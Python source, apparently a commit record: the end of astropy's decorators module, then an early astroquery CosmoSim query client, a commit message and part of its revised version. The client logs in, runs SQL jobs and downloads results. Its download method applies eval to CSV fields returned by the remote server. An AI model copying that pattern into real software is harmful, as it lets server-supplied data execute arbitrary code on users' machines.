>>> test(sig=2) # doctest: +SKIP
2
It is also possible to replace multiple arguments. The ``old_name``,
``new_name`` and ``since`` have to be `tuple` or `list` and contain the
same number of entries::
>>> @deprecated_renamed_argument(['a', 'b'], ['alpha', 'beta'],
... ['1.0', 1.2])
... def test(alpha, beta):
... return alpha, beta
>>> test(a=2, b=3) # doctest: +SKIP
(2, 3)
In this case ``arg_in_kwargs`` and ``relax`` can be a single value (which
is applied to all renamed arguments) or must also be a `tuple` or `list`
with values for each of the arguments.
"""
cls_iter = (list, tuple)
if isinstance(old_name, cls_iter):
n = len(old_name)
# Assume that new_name and since are correct (tuple/list with the
# appropriate length) in the spirit of the "consenting adults". But the
# optional parameters may not be set, so if these are not iterables
# wrap them.
if not isinstance(arg_in_kwargs, cls_iter):
arg_in_kwargs = [arg_in_kwargs] * n
if not isinstance(relax, cls_iter):
relax = [relax] * n
if not isinstance(pending, cls_iter):
pending = [pending] * n
else:
# To allow a uniform approach later on, wrap all arguments in lists.
n = 1
old_name = [old_name]
new_name = [new_name]
since = [since]
arg_in_kwargs = [arg_in_kwargs]
relax = [relax]
pending = [pending]
def decorator(function):
# The named arguments of the function.
arguments = signature(function).parameters
keys = list(arguments.keys())
position = [None] * n
for i in range(n):
# Determine the position of the argument.
if arg_in_kwargs[i]:
pass
else:
if new_name[i] is None:
param = arguments[old_name[i]]
elif new_name[i] in arguments:
param = arguments[new_name[i]]
# In case the argument is not found in the list of arguments
# the only remaining possibility is that it should be caught
# by some kind of **kwargs argument.
# This case has to be explicitly specified, otherwise throw
# an exception!
else:
raise TypeError(
f'"{new_name[i]}" was not specified in the function '
'signature. If it was meant to be part of '
'"**kwargs" then set "arg_in_kwargs" to "True"')
# There are several possibilities now:
# 1.) Positional or keyword argument:
if param.kind == param.POSITIONAL_OR_KEYWORD:
if new_name[i] is None:
position[i] = keys.index(old_name[i])
else:
position[i] = keys.index(new_name[i])
# 2.) Keyword only argument:
elif param.kind == param.KEYWORD_ONLY:
# These cannot be specified by position.
position[i] = None
# 3.) positional-only argument, varargs, varkwargs or some
# unknown type:
else:
raise TypeError(f'cannot replace argument "{new_name[i]}" '
f'of kind {repr(param.kind)}.')
@functools.wraps(function)
def wrapper(*args, **kwargs):
for i in range(n):
message = (f'"{old_name[i]}" was deprecated in version '
f'{since[i]} and will be removed in a future '
'version. ')
# The only way to have oldkeyword inside the function is
# that it is passed as kwarg because the oldkeyword
# parameter was renamed to newkeyword.
if old_name[i] in kwargs:
value = kwargs.pop(old_name[i])
# Display the deprecation warning only when it's not
# pending.
if not pending[i]:
if new_name[i] is not None:
message += f'Use argument "{new_name[i]}" instead.'
elif alternative:
message += f'\n Use {alternative} instead.'
warnings.warn(message, warning_type, stacklevel=2)
# Check if the newkeyword was given as well.
newarg_in_args = (position[i] is not None and
len(args) > position[i])
newarg_in_kwargs = new_name[i] in kwargs
if newarg_in_args or newarg_in_kwargs:
if not pending[i]:
# If both are given print a Warning if relax is
# True or raise an Exception is relax is False.
if relax[i]:
warnings.warn(
f'"{old_name[i]}" and "{new_name[i]}" '
'keywords were set. '
f'Using the value of "{new_name[i]}".',
AstropyUserWarning)
else:
raise TypeError(
f'cannot specify both "{old_name[i]}" and '
f'"{new_name[i]}".')
else:
# Pass the value of the old argument with the
# name of the new argument to the function
if new_name[i] is not None:
kwargs[new_name[i]] = value
# If old argument has no replacement, cast it back.
# https://github.com/astropy/astropy/issues/9914
else:
kwargs[old_name[i]] = value
# Deprecated keyword without replacement is given as
# positional argument.
elif (not pending[i] and not new_name[i] and position[i] and
len(args) > position[i]):
if alternative:
message += f'\n Use {alternative} instead.'
warnings.warn(message, warning_type, stacklevel=2)
return function(*args, **kwargs)
return wrapper
return decorator
# TODO: This can still be made to work for setters by implementing an
# accompanying metaclass that supports it; we just don't need that right this
# second
class classproperty(property):
"""
Similar to `property`, but allows class-level properties. That is,
a property whose getter is like a `classmethod`.
The wrapped method may explicitly use the `classmethod` decorator (which
must become before this decorator), or the `classmethod` may be omitted
(it is implicit through use of this decorator).
.. note::
classproperty only works for *read-only* properties. It does not
currently allow writeable/deletable properties, due to subtleties of how
Python descriptors work. In order to implement such properties on a class
a metaclass for that class must be implemented.
Parameters
----------
fget : callable
The function that computes the value of this property (in particular,
the function when this is used as a decorator) a la `property`.
doc : str, optional
The docstring for the property--by default inherited from the getter
function.
lazy : bool, optional
If True, caches the value returned by the first call to the getter
function, so that it is only called once (used for lazy evaluation
of an attribute). This is analogous to `lazyproperty`. The ``lazy``
argument can also be used when `classproperty` is used as a decorator
(see the third example below). When used in the decorator syntax this
*must* be passed in as a keyword argument.
Examples
--------
::
>>> class Foo:
... _bar_internal = 1
... @classproperty
... def bar(cls):
... return cls._bar_internal + 1
...
>>> Foo.bar
2
>>> foo_instance = Foo()
>>> foo_instance.bar
2
>>> foo_instance._bar_internal = 2
>>> foo_instance.bar # Ignores instance attributes
2
As previously noted, a `classproperty` is limited to implementing
read-only attributes::
>>> class Foo:
... _bar_internal = 1
... @classproperty
... def bar(cls):
... return cls._bar_internal
... @bar.setter
... def bar(cls, value):
... cls._bar_internal = value
...
Traceback (most recent call last):
...
NotImplementedError: classproperty can only be read-only; use a
metaclass to implement modifiable class-level properties
When the ``lazy`` option is used, the getter is only called once::
>>> class Foo:
... @classproperty(lazy=True)
... def bar(cls):
... print("Performing complicated calculation")
... return 1
...
>>> Foo.bar
Performing complicated calculation
1
>>> Foo.bar
1
If a subclass inherits a lazy `classproperty` the property is still
re-evaluated for the subclass::
>>> class FooSub(Foo):
... pass
...
>>> FooSub.bar
Performing complicated calculation
1
>>> FooSub.bar
1
"""
def __new__(cls, fget=None, doc=None, lazy=False):
if fget is None:
# Being used as a decorator--return a wrapper that implements
# decorator syntax
def wrapper(func):
return cls(func, lazy=lazy)
return wrapper
return super().__new__(cls)
def __init__(self, fget, doc=None, lazy=False):
self._lazy = lazy
if lazy:
self._lock = threading.RLock() # Protects _cache
self._cache = {}
fget = self._wrap_fget(fget)
super().__init__(fget=fget, doc=doc)
# There is a buglet in Python where self.__doc__ doesn't
# get set properly on instances of property subclasses if
# the doc argument was used rather than taking the docstring
# from fget
# Related Python issue: https://bugs.python.org/issue24766
if doc is not None:
self.__doc__ = doc
def __get__(self, obj, objtype):
if self._lazy:
val = self._cache.get(objtype, _NotFound)
if val is _NotFound:
with self._lock:
# Check if another thread initialised before we locked.
val = self._cache.get(objtype, _NotFound)
if val is _NotFound:
val = self.fget.__wrapped__(objtype)
self._cache[objtype] = val
else:
# The base property.__get__ will just return self here;
# instead we pass objtype through to the original wrapped
# function (which takes the class as its sole argument)
val = self.fget.__wrapped__(objtype)
return val
def getter(self, fget):
return super().getter(self._wrap_fget(fget))
def setter(self, fset):
raise NotImplementedError(
"classproperty can only be read-only; use a metaclass to "
"implement modifiable class-level properties")
def deleter(self, fdel):
raise NotImplementedError(
"classproperty can only be read-only; use a metaclass to "
"implement modifiable class-level properties")
@staticmethod
def _wrap_fget(orig_fget):
if isinstance(orig_fget, classmethod):
orig_fget = orig_fget.__func__
# Using stock functools.wraps instead of the fancier version
# found later in this module, which is overkill for this purpose
@functools.wraps(orig_fget)
def fget(obj):
return orig_fget(obj.__class__)
return fget
# Adapted from the recipe at
# http://code.activestate.com/recipes/363602-lazy-property-evaluation
class lazyproperty(property):
"""
Works similarly to property(), but computes the value only once.
This essentially memorizes the value of the property by storing the result
of its computation in the ``__dict__`` of the object instance. This is
useful for computing the value of some property that should otherwise be
invariant. For example::
>>> class LazyTest:
... @lazyproperty
... def complicated_property(self):
... print('Computing the value for complicated_property...')
... return 42
...
>>> lt = LazyTest()
>>> lt.complicated_property
Computing the value for complicated_property...
42
>>> lt.complicated_property
42
As the example shows, the second time ``complicated_property`` is accessed,
the ``print`` statement is not executed. Only the return value from the
first access off ``complicated_property`` is returned.
By default, a setter and deleter are used which simply overwrite and
delete, respectively, the value stored in ``__dict__``. Any user-specified
setter or deleter is executed before executing these default actions.
The one exception is that the default setter is not run if the user setter
already sets the new value in ``__dict__`` and returns that value and the
returned value is not ``None``.
"""
def __init__(self, fget, fset=None, fdel=None, doc=None):
super().__init__(fget, fset, fdel, doc)
self._key = self.fget.__name__
self._lock = threading.RLock()
def __get__(self, obj, owner=None):
try:
obj_dict = obj.__dict__
val = obj_dict.get(self._key, _NotFound)
if val is _NotFound:
with self._lock:
# Check if another thread beat us to it.
val = obj_dict.get(self._key, _NotFound)
if val is _NotFound:
val = self.fget(obj)
obj_dict[self._key] = val
return val
except AttributeError:
if obj is None:
return self
raise
def __set__(self, obj, val):
obj_dict = obj.__dict__
if self.fset:
ret = self.fset(obj, val)
if ret is not None and obj_dict.get(self._key) is ret:
# By returning the value set the setter signals that it
# took over setting the value in obj.__dict__; this
# mechanism allows it to override the input value
return
obj_dict[self._key] = val
def __delete__(self, obj):
if self.fdel:
self.fdel(obj)
obj.__dict__.pop(self._key, None) # Delete if present
class sharedmethod(classmethod):
"""
This is a method decorator that allows both an instancemethod and a
`classmethod` to share the same name.
When using `sharedmethod` on a method defined in a class's body, it
may be called on an instance, or on a class. In the former case it
behaves like a normal instance method (a reference to the instance is
automatically passed as the first ``self`` argument of the method)::
>>> class Example:
... @sharedmethod
... def identify(self, *args):
... print('self was', self)
... print('additional args were', args)
...
>>> ex = Example()
>>> ex.identify(1, 2)
self was <astropy.utils.decorators.Example object at 0x...>
additional args were (1, 2)
In the latter case, when the `sharedmethod` is called directly from a
class, it behaves like a `classmethod`::
>>> Example.identify(3, 4)
self was <class 'astropy.utils.decorators.Example'>
additional args were (3, 4)
This also supports a more advanced usage, where the `classmethod`
implementation can be written separately. If the class's *metaclass*
has a method of the same name as the `sharedmethod`, the version on
the metaclass is delegated to::
>>> class ExampleMeta(type):
... def identify(self):
... print('this implements the {0}.identify '
... 'classmethod'.format(self.__name__))
...
>>> class Example(metaclass=ExampleMeta):
... @sharedmethod
... def identify(self):
... print('this implements the instancemethod')
...
>>> Example().identify()
this implements the instancemethod
>>> Example.identify()
this implements the Example.identify classmethod
"""
def __get__(self, obj, objtype=None):
if obj is None:
mcls = type(objtype)
clsmeth = getattr(mcls, self.__func__.__name__, None)
if callable(clsmeth):
func = clsmeth
else:
func = self.__func__
return self._make_method(func, objtype)
else:
return self._make_method(self.__func__, obj)
@staticmethod
def _make_method(func, instance):
return types.MethodType(func, instance)
def format_doc(docstring, *args, **kwargs):
"""
Replaces the docstring of the decorated object and then formats it.
The formatting works like :meth:`str.format` and if the decorated object
already has a docstring this docstring can be included in the new
documentation if you use the ``{__doc__}`` placeholder.
Its primary use is for reusing a *long* docstring in multiple functions
when it is the same or only slightly different between them.
Parameters
----------
docstring : str or object or None
The docstring that will replace the docstring of the decorated
object. If it is an object like a function or class it will
take the docstring of this object. If it is a string it will use the
string itself. One special case is if the string is ``None`` then
it will use the decorated functions docstring and formats it.
args :
passed to :meth:`str.format`.
kwargs :
passed to :meth:`str.format`. If the function has a (not empty)
docstring the original docstring is added to the kwargs with the
keyword ``'__doc__'``.
Raises
------
ValueError
If the ``docstring`` (or interpreted docstring if it was ``None``
or not a string) is empty.
IndexError, KeyError
If a placeholder in the (interpreted) ``docstring`` was not filled. see
:meth:`str.format` for more information.
Notes
-----
Using this decorator allows, for example Sphinx, to parse the
correct docstring.
Examples
--------
Replacing the current docstring is very easy::
>>> from astropy.utils.decorators import format_doc
>>> @format_doc('''Perform num1 + num2''')
... def add(num1, num2):
... return num1+num2
...
>>> help(add) # doctest: +SKIP
Help on function add in module __main__:
<BLANKLINE>
add(num1, num2)
Perform num1 + num2
sometimes instead of replacing you only want to add to it::
>>> doc = '''
... {__doc__}
... Parameters
... ----------
... num1, num2 : Numbers
... Returns
... -------
... result: Number
... '''
>>> @format_doc(doc)
... def add(num1, num2):
... '''Perform addition.'''
... return num1+num2
...
>>> help(add) # doctest: +SKIP
Help on function add in module __main__:
<BLANKLINE>
add(num1, num2)
Perform addition.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
in case one might want to format it further::
>>> doc = '''
... Perform {0}.
... Parameters
... ----------
... num1, num2 : Numbers
... Returns
... -------
... result: Number
... result of num1 {op} num2
... {__doc__}
... '''
>>> @format_doc(doc, 'addition', op='+')
... def add(num1, num2):
... return num1+num2
...
>>> @format_doc(doc, 'subtraction', op='-')
... def subtract(num1, num2):
... '''Notes: This one has additional notes.'''
... return num1-num2
...
>>> help(add) # doctest: +SKIP
Help on function add in module __main__:
<BLANKLINE>
add(num1, num2)
Perform addition.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
result of num1 + num2
>>> help(subtract) # doctest: +SKIP
Help on function subtract in module __main__:
<BLANKLINE>
subtract(num1, num2)
Perform subtraction.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
result of num1 - num2
Notes : This one has additional notes.
These methods can be combined an even taking the docstring from another
object is possible as docstring attribute. You just have to specify the
object::
>>> @format_doc(add)
... def another_add(num1, num2):
... return num1 + num2
...
>>> help(another_add) # doctest: +SKIP
Help on function another_add in module __main__:
<BLANKLINE>
another_add(num1, num2)
Perform addition.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
result of num1 + num2
But be aware that this decorator *only* formats the given docstring not
the strings passed as ``args`` or ``kwargs`` (not even the original
docstring)::
>>> @format_doc(doc, 'addition', op='+')
... def yet_another_add(num1, num2):
... '''This one is good for {0}.'''
... return num1 + num2
...
>>> help(yet_another_add) # doctest: +SKIP
Help on function yet_another_add in module __main__:
<BLANKLINE>
yet_another_add(num1, num2)
Perform addition.
Parameters
----------
num1, num2 : Numbers
Returns
-------
result : Number
result of num1 + num2
This one is good for {0}.
To work around it you could specify the docstring to be ``None``::
>>> @format_doc(None, 'addition')
... def last_add_i_swear(num1, num2):
... '''This one is good for {0}.'''
... return num1 + num2
...
>>> help(last_add_i_swear) # doctest: +SKIP
Help on function last_add_i_swear in module __main__:
<BLANKLINE>
last_add_i_swear(num1, num2)
This one is good for addition.
Using it with ``None`` as docstring allows to use the decorator twice
on an object to first parse the new docstring and then to parse the
original docstring or the ``args`` and ``kwargs``.
"""
def set_docstring(obj):
if docstring is None:
# None means: use the objects __doc__
doc = obj.__doc__
# Delete documentation in this case so we don't end up with
# awkwardly self-inserted docs.
obj.__doc__ = None
elif isinstance(docstring, str):
# String: use the string that was given
doc = docstring
else:
# Something else: Use the __doc__ of this
doc = docstring.__doc__
if not doc:
# In case the docstring is empty it's probably not what was wanted.
raise ValueError('docstring must be a string or containing a '
'docstring that is not empty.')
# If the original has a not-empty docstring append it to the format
# kwargs.
kwargs['__doc__'] = obj.__doc__ or ''
obj.__doc__ = doc.format(*args, **kwargs)
return obj
return set_docstring
|
from __future__ import print_function
import requests
import sys
from bs4 import BeautifulSoup
import keyring
import getpass
import logging
import threading
import ipdb
# Astropy imports
from astropy.table import Table
import astropy.units as u
import astropy.coordinates as coord
import astropy.io.votable as votable
from astropy.io import fits
from astropy.io import votable
import astropy.utils.data as aud
# Astroquery imports
from ..utils import commons
from ..query import QueryWithLogin
from . import conf
__all__ = ['CosmoSim']
class CosmoSim(QueryWithLogin):
QUERY_URL = conf.query_url
SCHEMA_URL = conf.schema_url
TIMEOUT = conf.timeout
def __init__(self):
super(CosmoSim, self).__init__()
self.session = requests.session()
def _login(self, username, password=None):
self.session = requests.session()
self.username = username
# Get password from keyring or prompt
password_from_keyring = keyring.get_password("astroquery:www.cosmosim.org", self.username)
if password_from_keyring is None:
logging.warning("No password was found in the keychain for the provided username.")
# Check if running from scipt or interactive python session
import __main__ as main
# For script
if hasattr(main,'__file__'):
assert password, "No password provided."
self.password = password
# For interactive session
else:
self.password = getpass.getpass("{0}, enter your CosmoSim password:\n".format(self.username))
else:
self.password = password_from_keyring
# Authenticate
print("Authenticating {0} on www.cosmosim.org...".format(self.username))
authenticated = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password))
if authenticated.status_code == 200:
print("Authentication successful!")
elif authenticated.status_code == 401:
print("Authentication failed!")
elif authenticated.status_code == 503:
print("Service Temporarily Unavailable...")
# Generating dictionary of existing tables
self._existing_tables()
if authenticated.status_code == 200 and password_from_keyring is None:
keyring.set_password("astroquery:www.cosmosim.org", self.username, self.password)
# Delete job
soup = BeautifulSoup(authenticated.content)
self.delete_job(jobid="{}".format(soup.find("uws:jobid").string),squash=True)
return authenticated
def logout(self):
del self.session
del self.username
del self.password
def run_sql_query(self, query_string,tablename=None,queue=None):
"""
Public function which sends a POST request containing the sql query string.
Parameters
----------
query_string : string
The sql query to be sent to the CosmoSim.org server.
tablename : string
The name of the table for which the query data will be stored under. If left blank or if it already exists, one will be generated automatically.
Returns
-------
result : jobid
The jobid of the query
"""
self._existing_tables()
if not queue:
queue = 'short'
if tablename in self.table_dict.values():
result = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password),data={'query':query_string,'phase':'run','queue':queue})
soup = BeautifulSoup(result.content)
gen_tablename = str(soup.find(id="table").string)
logging.warning("Table name {} is already taken.".format(tablename))
print("Generated table name: {}".format(gen_tablename))
elif tablename is None:
result = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password),data={'query':query_string,'phase':'run','queue':queue})
else:
result = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password),data={'query':query_string,'table':'{}'.format(tablename),'phase':'run','queue':queue})
soup = BeautifulSoup(result.content)
self.current_job = str(soup.find("uws:jobid").string)
print("Job created: {}".format(self.current_job))
self._existing_tables()
return self.current_job
def _existing_tables(self):
"""
Internal function which builds a dictionary of the tables already in use for a given set of user credentials. Keys are jobids and values are the tables which are stored under those keys.
"""
checkalljobs = self.check_all_jobs()
completed_jobs = [key for key in self.job_dict.keys() if self.job_dict[key] in ['COMPLETED','EXECUTING']]
soup = BeautifulSoup(checkalljobs.content)
self.table_dict={}
for i in soup.find_all("uws:jobref"):
jobid = i.get('xlink:href').split('/')[-1]
if jobid in completed_jobs:
self.table_dict[jobid] = '{}'.format(i.get('id'))
def check_query_status(self,jobid=None):
"""
A public function which sends an http GET request for a given jobid, and checks the server status. If no jobid is provided, it uses the most recent query (if one exists).
Parameters
----------
jobid : string
The jobid of the sql query. If no jobid is given, it attemps to use the most recent job (if it exists in this session).
Returns
-------
result : content of 'requests.models.Response' object
The requests response phase
"""
if jobid is None:
if hasattr(self,'current_job'):
jobid = self.current_job
else:
try:
jobid = self.current_job
except:
raise AttributeError
response = self.session.get(CosmoSim.QUERY_URL+'/{}'.format(jobid)+'/phase',auth=(self.username,self.password),data={'print':'b'})
print("Job {}: {}".format(jobid,response.content))
return response.content
def check_all_jobs(self):
"""
Public function which builds a dictionary whose keys are each jobid for a given set of user credentials and whose values are the phase status (e.g. - EXECUTING,COMPLETED,PENDING,ERROR).
Returns
-------
checkalljobs : 'requests.models.Response' object
The requests response for the GET request for finding all existing jobs.
"""
checkalljobs = self.session.get(CosmoSim.QUERY_URL,auth=(self.username,self.password),params={'print':'b'})
self.job_dict={}
soup = BeautifulSoup(checkalljobs.content)
for i in soup.find_all("uws:jobref"):
i_phase = str(i.find('uws:phase').string)
if i_phase in ['COMPLETED','EXECUTING','ABORTED','ERROR']:
self.job_dict['{}'.format(i.get('xlink:href').split('/')[-1])] = i_phase
else:
self.job_dict['{}'.format(i.get('id'))] = i_phase
frame = sys._getframe(1)
do_not_print_job_dict = ['completed_job_info','delete_all_jobs','_existing_tables','delete_job','download'] # list of methods which use check_all_jobs() for which I would not like job_dict to be printed to the terminal
if frame.f_code.co_name in do_not_print_job_dict:
return checkalljobs
else:
print(self.job_dict)
return checkalljobs
def completed_job_info(self,jobid=None,output=False):
"""
A public function which sends an http GET request for a given jobid with phase COMPLETED, and returns a list containing the response object. If no jobid is provided, a list of all responses with phase COMPLETED is generated.
Parameters
----------
jobid : string
The jobid of the sql query.
output : bool
Print output of response(s) to the terminal
Returns
-------
result : list
A list of response object(s)
"""
self.check_all_jobs()
if jobid is None:
completed_jobids = [key for key in self.job_dict.keys() if self.job_dict[key] == 'COMPLETED']
response_list = [self.session.get(CosmoSim.QUERY_URL+"/{}".format(completed_jobids[i]),auth=(self.username,self.password)) for i in range(len(completed_jobids))]
else:
if self.job_dict[jobid] == 'COMPLETED':
response_list = [self.session.get(CosmoSim.QUERY_URL+"/{}".format(jobid),auth=(self.username,self.password))]
else:
logging.warning("JobID must refer to a query with a phase of 'COMPLETED'.")
if output is True:
for i in response_list:
print(i.content)
else:
print(response_list)
return response_list
def delete_job(self,jobid=None,squash=None):
"""
A public function which deletes a stored job from the server in any phase. If no jobid is given, it attemps to use the most recent job (if it exists in this session). If jobid is specified, then it deletes the corresponding job, and if it happens to match the existing current job, that variable gets deleted.
Parameters
----------
jobid : string
The jobid of the sql query. If no jobid is given, it attemps to use the most recent job (if it exists in this session).
output : bool
Print output of response(s) to the terminal
Returns
-------
result : list
A list of response object(s)
"""
self.check_all_jobs()
if not jobid:
if hasattr(self,'current_job'):
jobid = self.current_job
if jobid:
if hasattr(self,'current_job'):
if jobid == self.current_job:
del self.current_job
if self.job_dict[jobid] in ['COMPLETED','ERROR','ABORTED','PENDING']:
result = self.session.delete(CosmoSim.QUERY_URL+"/{}".format(jobid),auth=(self.username,self.password),data={'follow':''})
else:
print("Can only delete a job with phase: 'COMPLETED', 'ERROR', 'ABORTED', or 'PENDING'.")
return
if not result.ok:
result.raise_for_status()
if squash is None:
print('Deleted job: {}'.format(jobid))
return result
def abort_job(self,jobid=None):
"""
"""
self.check_all_jobs()
def delete_all_jobs(self):
"""
A public function which deletes all jobs from the server in any phase.
"""
self.check_all_jobs()
for key in self.job_dict.keys():
result = self.session.delete(CosmoSim.QUERY_URL+"/{}".format(key),auth=(self.username,self.password),data={'follow':''})
if not result.ok:
result.raise_for_status()
print("Deleted job: {}".format(key))
return
def _generate_schema(self):
"""
Internal function which builds a schema of all simulations within the database (in the form of a dictionary).
"""
response = requests.get(CosmoSim.SCHEMA_URL,
auth=(self.username,self.password),
headers = {'Accept': 'application/json'})
data = response.json()
self.db_dict = {}
for i in range(len(data['databases'])):
self.db_dict['{}'.format(data['databases'][i]['name'])] = {}
sstr = '{}'.format(data['databases'][i]['name'])
sid = '{}'.format(data['databases'][i]['id'])
self.db_dict[sstr]['id'] = sid
sdesc = '{}'.format(data['databases'][i]['description'])
self.db_dict[sstr]['description'] = sdesc
self.db_dict[sstr]['tables'] = {}
for j in range(len(data['databases'][i]['tables'])):
sstr2 = '{}'.format(data['databases'][i]['tables'][j]['name'])
self.db_dict[sstr]['tables'][sstr2] = {}
sdata = data['databases'][i]['tables'][j]['id']
self.db_dict[sstr]['tables'][sstr2]['id'] = sdata
sdesc2 = data['databases'][i]['tables'][j]['description']
self.db_dict[sstr]['tables'][sstr2]['description'] = sdesc2
self.db_dict[sstr]['tables'][sstr2]['columns'] = {}
tmpval = len(data['databases'][i]['tables'][j]['columns'])
for k in range(tmpval):
sstr3 = '{}'.format(data['databases'][i]['tables'][j]['columns'][k]['name'])
self.db_dict[sstr]['tables'][sstr2]['columns'][sstr3] = {}
sdata2 = data['databases'][i]['tables'][j]['columns'][k]['id']
self.db_dict[sstr]['tables'][sstr2]['columns'][sstr3]['id'] = sdata2
sdesc3 = data['databases'][i]['tables'][j]['columns'][k]['description']
self.db_dict[sstr]['tables'][sstr2]['columns'][sstr3]['description'] = sdesc3
return response
def explore_db(self,db=None,table=None,col=None):
"""
A public function which allows for the exploration of any simulation and its tables within the database. This function is meant to aid the user in constructing sql queries.
Parameters
----------
db : string
The database to explore.
table : string
The table to explore.
col : string
The column to explore.
"""
try:
self.db_dict
except AttributeError:
self._generate_schema()
if db:
if table:
if col:
print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
print("@ {}".format("tables"))
print(" @ {}".format(table))
print(" "*6 + "@ {}".format("columns"))
print(" "*9 + "@ {}".format('{}'.format(col)))
for i in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)]['columns']['{}'.format(col)].keys():
print(" "*12 + "--> {}:{}".format(i,self.db_dict['{}'.format(db)]['tables']['{}'.format(table)]['columns']['{}'.format(col)][i]))
else:
print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
print("@ {}".format("tables"))
print(" @ {}".format(table))
for i in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)].keys():
if type(self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i]) == dict:
print(" "*6 + "@ {}".format(i))
for j in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i].keys():
print(" "*9 + "--> {}".format(j))
else:
print(" "*6 + "$ {}".format(i))
print(" "*9 + "--> {}".format(self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i]))
else:
print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
for i in self.db_dict['{}'.format(db)].keys():
if type(self.db_dict['{}'.format(db)][i]) == dict:
print("@ {}".format(i))
for j in self.db_dict['{}'.format(db)][i].keys():
print(" --> {}".format(j))
else:
print("$ {}".format(i))
print(" --> {}".format(self.db_dict['{}'.format(db)][i]))
else:
print("Must choose a database to explore:")
for i in self.db_dict.keys():
print(" ## " + "{}".format(i))
return
def download(self,jobid=None,filename=None,format=None):
"""
A public function to download data from a job with COMPLETED phase.
Keyword Args
------------
jobid :
Completed jobid to be downloaded
filename : string
If left blank, downloaded to the terminal. If specified, data is written out to file (directory can be included here).
Returns
-------
headers, data : list, list
"""
if not jobid:
try:
jobid = self.current_job
except:
raise
self.check_all_jobs()
completed_job_responses = self.completed_job_info(jobid)
soup = BeautifulSoup(completed_job_responses[0].content)
tableurl = soup.find("uws:result").get("xlink:href")
# This is where the request.content parsing happens
raw_table_data = self.session.get(tableurl,auth=(self.username,self.password))
raw_headers = raw_table_data.content.split('\n')[0]
num_cols = len(raw_headers.split(','))
num_rows = len(raw_table_data.content.split('\n'))-2
headers = [raw_headers.split(',')[i].strip('"') for i in range(num_cols)]
raw_data = [raw_table_data.content.split('\n')[i+1].split(",") for i in range(num_rows)]
data = [map(eval,raw_data[i]) for i in range(num_rows)]
if format:
tbl = Table(data=map(list, zip(*data)),names=headers)
if format in ['VOTable','votable']:
votbl = votable.from_table(tbl)
if not filename:
return votbl
else:
if '.xml' in filename:
filename = filename.split('.')[0]
votable.writeto(votbl, "{}.xml".format(filename))
print("Data written to file: {}.xml".format(filename))
elif format in ['FITS','fits']:
print("Need to implement...")
else:
if not filename:
return headers, data
else:
with open(filename, 'wb') as fh:
raw_table_data = self.session.get(tableurl,auth=(self.username,self.password),stream=True)
for block in raw_table_data.iter_content(1024):
if not block:
break
fh.write(block)
print("Data written to file: {}".format(filename))
return headers, data
def _check_phase(self,jobid):
self._existing_tables()
if jobid not in self.job_dict.keys():
logging.error("Job not present in job doctionary.")
return
else:
phase = self.job_dict['{}'.format(jobid)]
return phase
Fixed up the logout() function such that it checks for username/password attributes. Also gave it a hard logout option which deletes the password from the keychain. Created a check_login_status() function which provides the user information about the success or failure of their login attempt.
from __future__ import print_function
import requests
import sys
from bs4 import BeautifulSoup
import keyring
import getpass
import logging
import threading
import ipdb
# Astropy imports
from astropy.table import Table
import astropy.units as u
import astropy.coordinates as coord
import astropy.io.votable as votable
from astropy.io import fits
from astropy.io import votable
import astropy.utils.data as aud
# Astroquery imports
from ..utils import commons
from ..query import QueryWithLogin
from . import conf
__all__ = ['CosmoSim']
class CosmoSim(QueryWithLogin):
QUERY_URL = conf.query_url
SCHEMA_URL = conf.schema_url
TIMEOUT = conf.timeout
def __init__(self):
super(CosmoSim, self).__init__()
self.session = requests.session()
def _login(self, username, password=None):
self.session = requests.session()
self.username = username
# Get password from keyring or prompt
password_from_keyring = keyring.get_password("astroquery:www.cosmosim.org", self.username)
if password_from_keyring is None:
logging.warning("No password was found in the keychain for the provided username.")
# Check if running from scipt or interactive python session
import __main__ as main
# For script
if hasattr(main,'__file__'):
assert password, "No password provided."
self.password = password
# For interactive session
else:
self.password = getpass.getpass("{0}, enter your CosmoSim password:\n".format(self.username))
else:
self.password = password_from_keyring
# Authenticate
print("Authenticating {0} on www.cosmosim.org...".format(self.username))
authenticated = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password))
if authenticated.status_code == 200:
print("Authentication successful!")
elif authenticated.status_code == 401:
print("Authentication failed!")
elif authenticated.status_code == 503:
print("Service Temporarily Unavailable...")
# Generating dictionary of existing tables
self._existing_tables()
if authenticated.status_code == 200 and password_from_keyring is None:
keyring.set_password("astroquery:www.cosmosim.org", self.username, self.password)
# Delete job
#ipdb.set_trace()
soup = BeautifulSoup(authenticated.content)
self.delete_job(jobid="{}".format(soup.find("uws:jobid").string),squash=True)
return authenticated
def logout(self,hard=True):
"""
Public function which allows the user to logout of their cosmosim credentials.
Parameters
----------
hard : bool
A hard logout - delete the password to the associated username from the keychain. The default is True.
Returns
-------
"""
if hasattr(self,'username') and hasattr(self,'password') and hasattr(self,'session'):
if hard is True:
keyring.delete_password("astroquery:www.cosmosim.org", self.username)
print("Removed password for {} in the keychain.".format(self.username))
del self.session
del self.username
del self.password
else:
logging.error("You must log in before attempting to logout.")
def check_login_status(self):
"""
Public function which checks the status of a user login attempt.
"""
if hasattr(self,'username') and hasattr(self,'password') and hasattr(self,'session'):
authenticated = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password))
if authenticated.status_code == 200:
print("Status: You are logged in as {}.".format(self.username))
else:
logging.warning("Status: The username/password combination for {} appears to be incorrect.".format(self.username))
print("Please re-attempt to login with your cosmosim credentials.")
else:
print("Status: You are not logged in.")
def run_sql_query(self, query_string,tablename=None,queue=None):
"""
Public function which sends a POST request containing the sql query string.
Parameters
----------
query_string : string
The sql query to be sent to the CosmoSim.org server.
tablename : string
